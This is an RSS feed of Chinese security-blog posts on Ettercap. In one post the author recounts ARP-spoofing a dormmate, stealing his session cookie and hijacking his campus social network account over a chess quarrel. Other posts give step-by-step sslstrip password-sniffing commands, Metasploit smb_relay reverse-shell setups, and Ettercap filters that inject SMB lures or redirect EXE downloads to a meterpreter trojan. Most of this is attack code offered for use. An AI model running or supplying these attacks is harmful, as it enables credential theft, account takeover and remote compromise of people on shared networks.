<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>0x50sec.org &#187; Ettercap</title>
	<atom:link href="http://www.0x50sec.org/tag/ettercap/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.0x50sec.org</link>
	<description>Focus on web security!</description>
	<lastBuildDate>Fri, 13 Jan 2012 09:23:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>交换机环境下利用ettercap盗取cookie劫持校内网认证会话</title>
		<link>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/</link>
		<comments>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/#comments</comments>
		<pubDate>Mon, 24 May 2010 03:23:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[校内网]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=890</guid>
		<description><![CDATA[昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。 男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。 俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。 本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。 ettercap出场，贴图 利用ettercap进行对目标arp欺骗以及嗅探找到目标跟校内网的tcp连接 查看会话校信息找到cookie 利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下]]></description>
			<content:encoded><![CDATA[<p>昨天跟某舍友下象棋，说谁输了就买雪糕给对方吃。</p>
<p>男子汉大豆腐，焉能言而无信，谁料在我将死对方后，对方居然真的使用了绝技，死不认帐，耍赖皮。</p>
<p>俺只好将其行公布于校内网，结果连我们导师都鄙视那种行为，并鼓励我用板砖拍他。其他围观者也是无不愤然谴责之。谁料这厮利用舆论机器，在校内网颠倒是非、指鹿为马。偶只好进入其校内网，断其话语权，还事实真想于大众。</p>
<p>本来那厮用的网页登录很容易搞到其密码，谁知最近用了个校内网客户端，从那里进入网页，也就不用登录了。这下好，搞不到密码就搞他的cookie吧，反正一样。</p>
<p>ettercap出场，贴图</p>
<p><span id="more-890"></span><a href="http://www.0x50sec.org/wp-content/uploads/2010/05/1.png"><img class="aligncenter size-medium wp-image-891" title="1" src="http://www.0x50sec.org/wp-content/uploads/2010/05/1-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">利用ettercap进行对目标arp欺骗以及嗅探<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/2.png"><img class="aligncenter size-medium wp-image-892" title="2" src="http://www.0x50sec.org/wp-content/uploads/2010/05/2-300x230.png" alt="" width="300" height="230" /></a>找到目标跟校内网的tcp连接<a href="http://www.0x50sec.org/wp-content/uploads/2010/05/3.png"><img class="aligncenter size-medium wp-image-893" title="3" src="http://www.0x50sec.org/wp-content/uploads/2010/05/3-300x230.png" alt="" width="300" height="230" /></a></p>
<p style="text-align: center;">查看会话校信息找到cookie</p>
<p style="text-align: center;"><img class="aligncenter size-medium wp-image-894" title="23" src="http://www.0x50sec.org/wp-content/uploads/2010/05/23-294x300.png" alt="" width="294" height="300" /></p>
<p style="text-align: center;">利用tamper data修改cookie成功登录校内网，还原事实真想并修改其头像恶搞一下</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e5%88%a9%e7%94%a8ettercap%e7%9b%97%e5%8f%96cookie%e5%8a%ab%e6%8c%81%e6%a0%a1%e5%86%85%e7%bd%91%e8%ae%a4%e8%af%81%e4%bc%9a%e8%af%9d/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>利用sslstrip和ettercap交换机环境下突破ssl嗅探密码视频教程</title>
		<link>http://www.0x50sec.org/%e5%88%a9%e7%94%a8sslstrip%e5%92%8cettercap%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e7%aa%81%e7%a0%b4ssl%e5%97%85%e6%8e%a2%e5%af%86%e7%a0%81%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/</link>
		<comments>http://www.0x50sec.org/%e5%88%a9%e7%94%a8sslstrip%e5%92%8cettercap%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e7%aa%81%e7%a0%b4ssl%e5%97%85%e6%8e%a2%e5%af%86%e7%a0%81%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/#comments</comments>
		<pubDate>Sat, 20 Mar 2010 06:18:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[sslstrip]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=374</guid>
		<description><![CDATA[依然是放在linux520的。 ppt传上来arpsniff-ssl 在线观看: http://www.linux520.com/v/l00069/index.html 本教程不是原创，是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具，配合ettercap进行arp欺骗，可以突破经过ssl加密的协议(如https等，一种被动使用https协议的会受到攻击），进行局域网arp嗅探获得口令等信息,本教程不涉及原理，只讲应用，我尽量迅速录完节省大家时间 •仍然跟大家说声抱歉，因为个人原因最近比较惆怅，因此不爱说话，所以还是不录语音教程了，见谅！  准备工作 下载sslstrip，我下载的是最新版本 •wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz 访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助 安装： python setup.py install 开始之前先要打开 ip_forword转发，否而会出现一些错误，感兴趣的可以查找相关资料并自行测试&#8230;纸上得来终觉浅，屏幕上就更浅了，实践出真知 echo “1”&#62;/proc/sys/net/ipv4/ip_forward   使用Iptables过滤数据包   iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-port 10000 通过iptables 把所有http数据导入到10000端口，我们用sslstrip监听10000端口，并得到我们想要的数据 参数讲解: -t:命令要操作匹配的表（net这个表表示被查询时遇到了新差生的连接包） Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT（修改路由之前本地的包）、POSTROUTING(修改准备出去的包) -A表示在选择的链后加入更多选项 –p指被过滤包的协议 &#8211;destination-port 80指被过滤包的目的端口是80 •-j REDIRECT &#8211;to-port 10000 将80端口的数据跳转到指定端口传输 然后我们使用sslstrip监听10000端口 sslstrip -l 10000 [...]]]></description>
			<content:encoded><![CDATA[<p>依然是放在linux520的。</p>
<p>ppt传上来<a href="http://www.0x50sec.org/wp-content/uploads/2010/03/arpsniff-ssl.ppt">arpsniff-ssl</a></p>
<p>在线观看:</p>
<p><a href="http://www.linux520.com/v/l00069/index.html">http://www.linux520.com/v/l00069/index.html</a></p>
<p>本教程不是原创，是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具，配合ettercap进行arp欺骗，可以突破经过ssl加密的协议(如https等，一种被动使用https协议的会受到攻击），进行局域网arp嗅探获得口令等信息,本教程不涉及原理，只讲应用，我尽量迅速录完节省大家时间 •仍然跟大家说声抱歉，因为个人原因最近比较惆怅，因此不爱说话，所以还是不录语音教程了，见谅！</p>
<p> <strong>准备工作</strong></p>
<p>下载sslstrip，我下载的是最新版本 •wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz</p>
<p>访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助</p>
<p>安装：</p>
<p>python setup.py install</p>
<p><span id="more-374"></span>开始之前先要打开 ip_forword转发，否而会出现一些错误，感兴趣的可以查找相关资料并自行测试&#8230;纸上得来终觉浅，屏幕上就更浅了，实践出真知</p>
<p>echo “1”&gt;/proc/sys/net/ipv4/ip_forward</p>
<p><strong>  使用Iptables过滤数据包</strong></p>
<p>  iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-port 10000</p>
<p>通过iptables 把所有http数据导入到10000端口，我们用sslstrip监听10000端口，并得到我们想要的数据</p>
<p>参数讲解: -t:命令要操作匹配的表（net这个表表示被查询时遇到了新差生的连接包）</p>
<p>Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT（修改路由之前本地的包）、POSTROUTING(修改准备出去的包)</p>
<p>-A表示在选择的链后加入更多选项</p>
<p>–p指被过滤包的协议</p>
<p>&#8211;destination-port 80指被过滤包的目的端口是80 •-j REDIRECT &#8211;to-port 10000 将80端口的数据跳转到指定端口传输</p>
<p>然后我们使用sslstrip监听10000端口</p>
<p>sslstrip -l 10000</p>
<p><strong>  利用ettercap进行arp欺骗</strong></p>
<p>  前面的视频教程已经讲过ettercap的基本用法在此不赘述</p>
<p>ettercap –T –q –M arp:remote /192.168.1.101/ //</p>
<p>Ettercap默认就会过滤密码，我们也不需要指定过滤脚本</p>
<p><strong>  Ok开始测试</strong></p>
<p>echo “1”&gt;/proc/sys/net/ipv4/ip_forward</p>
<p>iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-port 10000</p>
<p>sslstrip -l 10000</p>
<p>会在运行的当前目录生成sslstrip.log我们用ettercap不看这个也可以~~~</p>
<p>•Arp欺骗开始，我对我的物理机192.168.1.101进行攻击测试</p>
<p>ettercap –T –q –M arp:remote /192.168.1.101/ //</p>
<p>  好的开始了，我登陆gmail看看 Ettercap成功截获到了gmail的密码~~~</p>
<p>•这里用ettercap密码非常方便就看到了也可以查看sslstrip的日志文件，也是保存了我们的密码</p>
<p>严禁用于攻击别人银行等账号！这是一种盗窃！</p>
<p>下面说下防御</p>
<p>Sslstrip的攻击方式是一种中间人攻击，需要进行arp欺骗，所以在设置好浏览器本身安全的基础上，要绑定mac和ip等在网关和本机双向绑定，或者启用arp防火墙对arp攻击进行防御</p>
<p><a href="http://www.linux520.com/v/l00069/index.html"></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e5%88%a9%e7%94%a8sslstrip%e5%92%8cettercap%e4%ba%a4%e6%8d%a2%e6%9c%ba%e7%8e%af%e5%a2%83%e4%b8%8b%e7%aa%81%e7%a0%b4ssl%e5%97%85%e6%8e%a2%e5%af%86%e7%a0%81%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit iepeers vul whith ettercap视频教程</title>
		<link>http://www.0x50sec.org/exploit-iepeers-vul-whith-ettercap%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/</link>
		<comments>http://www.0x50sec.org/exploit-iepeers-vul-whith-ettercap%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/#comments</comments>
		<pubDate>Thu, 18 Mar 2010 06:40:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[iepeers]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=369</guid>
		<description><![CDATA[为linux520.com做了一个视频教程 Exploit iepeers vul whith ettercap and metasploit framework video 在线观看： Exploit iepeers vul whith ettercap（上集） http://www.linux520.com/v/l00066/l00066.html Exploit iepeers vul whith ettercap（下集） http://www.linux520.com/v/l00067/l00067.html ppt传上来~~~ Exploit iepeers vul whith ettercap &#38;&#38;msf(ppt): Exploit iepeers vul whith ettercap 写在前面的废话： 本教程是kindle童鞋写的，kindle教我不少东西，本来应该得到我等小菜感恩戴德，无奈这厮最近日站日多了，太累，最近发高烧，所以由偶代录，希望kindle看到本教程立马退烧继续日站 •跟大家说声抱歉，因为个人原因最近比较惆怅，对，也叫蛋疼，因此不爱说话，所以就不录语音教程了，见谅！请忽略白字谢谢！ 视频地址稍后补上~~~ 请访问linux520.com]]></description>
			<content:encoded><![CDATA[<p>为linux520.com做了一个视频教程</p>
<p>Exploit iepeers vul whith ettercap and metasploit framework video</p>
<p><span style="font-size: small;"><span style="color: red;"><strong>在线观看</strong></span>：</span></p>
<h1>Exploit iepeers vul whith ettercap（上集）</h1>
<p><a href="http://www.linux520.com/v/l00066/l00066.html" target="_blank"><span style="font-size: small;"><span style="color: blue;">http://www.linux520.com/v/l00066/l00066.html</span></span></a></p>
<h1>Exploit iepeers vul whith ettercap（下集）</h1>
<p><a href="http://www.linux520.com/v/l00067/l00067.html" target="_blank"><span style="font-size: small;"><span style="color: blue;">http://www.linux520.com/v/l00067/l00067.html</span></span></a></p>
<p>ppt传上来~~~</p>
<p>Exploit iepeers vul whith ettercap &amp;&amp;msf(ppt):</p>
<p><a href="http://www.0x50sec.org/wp-content/uploads/2010/03/linux520.ppt">Exploit iepeers vul whith ettercap</a></p>
<p>写在前面的废话：</p>
<p><span style="color: #ffffff;"> 本教程是<span style="color: #ff0000;">kindle</span>童鞋写的，kindle教我不少东西，本来应该得到我等小菜感恩戴德，无奈这厮最近日站日多了，太累，最近发高烧，所以由偶代录，希望kindle看到本教程立马退烧继续日站 •跟大家说声抱歉，因为个人原因最近比较惆怅，对，也叫<span style="color: #ff0000;">蛋疼</span>，因此不爱说话，所以就不录语音教程了，见谅！请忽略白字谢谢！</span></p>
<p><span style="color: #ffffff;">视频地址稍后补上~~~</span></p>
<p><span style="color: #ff0000;">请访问linux520.com</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/exploit-iepeers-vul-whith-ettercap%e8%a7%86%e9%a2%91%e6%95%99%e7%a8%8b/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[zz]Have Fun With Ettercap Filter In LAN</title>
		<link>http://www.0x50sec.org/have-fun-with-ettercap-filter-in-lan/</link>
		<comments>http://www.0x50sec.org/have-fun-with-ettercap-filter-in-lan/#comments</comments>
		<pubDate>Fri, 05 Mar 2010 11:10:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[ARP]]></category>
		<category><![CDATA[Ettercap]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=353</guid>
		<description><![CDATA[From：http://huairen.me/archives/234.html 作者：Mickey 前几天pt007 带我去玩，在车上讨论了下内网入侵的思路，当时说到了利用ARP 欺骗加上smbrelay 来得到主机cmdshell 的方法，又提到了一个当用户通过浏览器下载EXE 文件的时候，利用ARP 欺骗 把数据流都引到本地，然后替换成我们事先准备好的后门，再转发出去，这样当目标运行了下载的EXE 后，我们就能得到主机的访问权限了，今天下午正好无事，就找了找资料，测试了下，顺带的也学了 学Ettercap 的使用。 一．Ettercap+SMBRELAY 还是先说一下我的渗透测试平台，我用的是Ubuntu9.04,Ettercap 0.7.3,MetaSploit 3.2，我们先用 MetaSploit 里的SmbRelay 来监听本地的445，使用之前，如果本地有Samba 服务在运行的话，需要先关闭，否则会造成端口冲突的。首先运行msfconsole，命令如下： sudo ./msfconsole use exploit/windows/smb/smb_relay set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.1.52 set LPORT 53 exploit 这里我选择的payload 是反向连接到本地的53 端口的，运行效果如图： 接下来，我们编写Ettercap 的Filter,过滤脚本内容如下： if (ip.proto == TCP &#38;&#38; tcp.dst == 80) { if (search(DATA.data,”Accept-Encoding”)) { replace(“Accept-Encoding”,”Accept-Mousecat”); msg(“zapped Accept-Encoding!\n”); [...]]]></description>
			<content:encoded><![CDATA[<p>From：http://huairen.me/archives/234.html</p>
<p>作者：Mickey<br />
前几天pt007 带我去玩，在车上讨论了下内网入侵的思路，当时说到了利用ARP 欺骗加上smbrelay<br />
来得到主机cmdshell 的方法，又提到了一个当用户通过浏览器下载EXE 文件的时候，利用ARP 欺骗<br />
把数据流都引到本地，然后替换成我们事先准备好的后门，再转发出去，这样当目标运行了下载的EXE<br />
后，我们就能得到主机的访问权限了，今天下午正好无事，就找了找资料，测试了下，顺带的也学了<br />
学Ettercap 的使用。<br />
一．Ettercap+SMBRELAY<br />
还是先说一下我的渗透测试平台，我用的是Ubuntu9.04,Ettercap 0.7.3,MetaSploit 3.2，我们先用<br />
MetaSploit 里的SmbRelay 来监听本地的445，使用之前，如果本地有Samba 服务在运行的话，需要先关闭，否则会造成端口冲突的。首先运行msfconsole，命令如下：</p>
<p><span id="more-353"></span> sudo ./msfconsole<br />
use exploit/windows/smb/smb_relay<br />
set PAYLOAD windows/shell_reverse_tcp<br />
set LHOST 192.168.1.52<br />
set LPORT 53<br />
exploit<br />
这里我选择的payload 是反向连接到本地的53 端口的，运行效果如图：<br />
接下来，我们编写Ettercap 的Filter,过滤脚本内容如下：<br />
if (ip.proto == TCP &amp;&amp; tcp.dst == 80) {<br />
if (search(DATA.data,”Accept-Encoding”)) {<br />
replace(“Accept-Encoding”,”Accept-Mousecat”);<br />
msg(“zapped Accept-Encoding!\n”);<br />
}<br />
}<br />
if (ip.proto == TCP &amp;&amp; tcp.src == 80) {<br />
replace(“&lt;/body&gt;”,”&lt;img src=\”<a>\\\\192.168.1.52\\fvck.jpg\</a>“&gt; &lt;/body&gt;” “);<br />
replace(“&lt;/Body&gt;”,”&lt;img src=\”<a>\\\\192.168.1.52\\fvck.jpg\</a>“&gt; &lt;/body&gt;” “);<br />
msg(“Filter Ran.\n”);<br />
}<br />
Ettercap 的filter 语法规则，可以通过man 8 etterfilter 来查看,我这里说说比较容易出错的地方，if 和<br />
(之间必须有一个空格，每个if 语句块必须用{}来包含，只要注意这2点，基本上就没什么问题了。<br />
简单说下这段filter 的含义，第一个if 语句块，如果ip 协议匹配TCP，并且目标端口是80的话，则搜<br />
索HTTP 数据流的Accept-Encoding，并且替换为Accept-Mousecat，然后在控制台打印一条“zapped<br />
Accept-Encoding”的消息，这么做的目的，是为了避免目标客户端浏览器像启用了GZIP 这样的数据压<br />
缩功能。<br />
第二个if 语句块，如果ip 协议匹配TCP,并且源端口是80的话，则搜索&lt;/body&gt;和&lt;/Body&gt;关键字，<br />
并且替换为img，并且把img 的src 属性通过smb 方式指向我们用metasploit smbrelay 监听的445服<br />
务，最后在控制台上打印”Filter Ran”运行的信息，如果你html 好的话，你也可以自己修改成其他的html<br />
标签。<br />
写好以后，用etterfilter 编译一下<br />
etterfilter smbrelay.filter -o smbrelay.ef<br />
效果如图：<br />
接下来使用Ettercap 来进行arp 欺骗，我这里只对内网的192.168.1.67进行ARP 欺骗<br />
ettercap -T -q -F smbrelay.ef -M ARP /192.168.1.67/ //<br />
各参数意义如下：<br />
-T:使用TEXT 模式启动<br />
-q:启用安静模式<br />
-F:加载指定的filter<br />
-M:指定使用ARP 模块<br />
当192.168.1.67 使用浏览器浏览网页的时候， 他浏览的所有网页里都会被插入&lt;img<br />
src=\\192.168.1.52\fvck.jpg&gt;,这时候metasploit 也有响应了。我们得到了目标的cmdshell.<br />
为了验证下，我刚才说的，使用新建立的用户登陆192.168.1.67,看下效果<br />
当然了，用这个方法，如果有网马的话，也可以直接使用了，也可以进行XSS 攻击。<br />
二．替换目标下载的exe 文件<br />
我这里用msfpayload 生成一个反向连接的exe 后门（这里exe 命名成setup.exe/install.exe 的原因是，<br />
可以绕过vista 的uac,当然是需要管理员2次点击的）<br />
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.52 LPORT=8888 X<br />
&gt;/home/mickey/setup.exe<br />
然后用msfcli 本地监听8888端口<br />
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.52<br />
LPORT=8888 E<br />
编写filter 脚本<br />
if (ip.proto == TCP &amp;&amp; tcp.dst == 80) {<br />
if (search(DATA.data, “Accept-Encoding”)) {<br />
replace(“Accept-Encoding”, “Accept-Mousecat”);<br />
msg(“zapped Accept-Encoding!\n”);<br />
}<br />
}<br />
if (ip.proto == TCP &amp;&amp; tcp.src == 80) {<br />
replace(“keep-alive”, “close” “);<br />
replace(“Keep-Alive”, “close” “);<br />
}<br />
if (ip.proto == TCP &amp;&amp; search(DATA.data, “: application”) ){<br />
msg(“found EXE\n”);<br />
if (search(DATA.data, “Win32″)) {<br />
msg(“doing nothing\n”);<br />
} else {<br />
replace(“200 OK”, “301 Moved Permanently<br />
Location: http://www.hackest.cn/tools/setup.exe“);<br />
msg(“redirect success\n”);<br />
}<br />
}<br />
原理是当目标下载windows 格式的exe 文件时，替换当前页面的http 响应信息202为301,并且重定向<br />
到我存放木马的地方。<br />
使用etterfilter 编译一下<br />
Etterfilter smbrelay.filter -o smbrelay.ef<br />
加载downexe.ef 过滤器，进行arp 欺骗<br />
sudo ettercap -T -q -F downexe.ef -M arp /192.168.1.67/ //<br />
当目标进行网上冲浪，并且下载exe 文件，并运行后，我们就得到主机的权限了，当然我这里做的比<br />
较粗糙，可以使用绑定器或者winrar 把文件合并起来，并且修改下exe 文件的图标，这样就显的更真<br />
实了。<br />
现在登陆192.168.1.67看一下效果，并且做下验证<br />
详细的过程，可以通过wireshark 抓包看的很详细<br />
文章写的仓促，有错误的地方，和有好的思路的同学，可以联系我一起交流。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/have-fun-with-ettercap-filter-in-lan/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

